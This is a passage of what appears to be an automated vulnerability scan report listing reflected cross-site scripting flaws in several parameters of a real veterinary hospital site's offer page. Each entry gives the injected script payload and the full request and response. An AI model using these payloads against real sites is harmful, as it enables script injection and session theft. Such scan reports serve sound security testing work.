b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:51 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=leokka2dvj8dli9epn3okqvbc4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=c6359"><script>alert(1)</script>440a5a05f49&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddre
...[SNIP]...

2.72. http://www.vcahospitals.com/main/offer/ [phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b5b4"><script>alert(1)</script>0df15c3c289 was submitted in the phone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=9b5b4"><script>alert(1)</script>0df15c3c289&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=4pt8m6oa7m32ci7i96uoh1kn01; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=9b5b4"><script>alert(1)</script>0df15c3c289&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d17
...[SNIP]...

2.73. http://www.vcahospitals.com/main/offer/ [referer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the referer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c43ae"><script>alert(1)</script>6f18be7751f was submitted in the referer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3Fc43ae"><script>alert(1)</script>6f18be7751f HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:14 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
rm action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3Fc43ae"><script>alert(1)</script>6f18be7751f" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.74. http://www.vcahospitals.com/main/offer/ [state parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the state request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce804"><script>alert(1)</script>ee024cf54a8 was submitted in the state parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?=3&state=FLce804"><script>alert(1)</script>ee024cf54a8&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:59 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?=3&state=FLce804"><script>alert(1)</script>ee024cf54a8&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.75. http://www.vcahospitals.com/main/offer/ [submit parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the submit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b158"><script>alert(1)</script>2bba563e314 was submitted in the submit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon6b158"><script>alert(1)</script>2bba563e314&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:09 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ga94m4jju2j64t9htmvidu7h93; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon6b158"><script>alert(1)</script>2bba563e314&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26gui
...[SNIP]...

2.76. http://www.vcahospitals.com/main/offer/ [token parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the token request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be60f"><script>alert(1)</script>0efb51ecb80 was submitted in the token parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fdbe60f"><script>alert(1)</script>0efb51ecb80&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:15 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=s4bduitjbvoil74qo6fal13d00; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
lla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fdbe60f"><script>alert(1)</script>0efb51ecb80&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF
...[SNIP]...

2.77. http://www.vcahospitals.com/main/offer/ [tollfree parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the tollfree request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a5ed"><script>alert(1)</script>e20dadccfe7 was submitted in the tollfree parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-84161a5ed"><script>alert(1)</script>e20dadccfe7&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ads2nfd0qnf81gp16ap84q27u0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
ble%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-84161a5ed"><script>alert(1)</script>e20dadccfe7&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.19
...[SNIP]...

2.78. http://www.vcahospitals.com/main/offer/ [uri parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the uri request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a040b"><script>alert(1)</script>f73da84759e was submitted in the uri parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

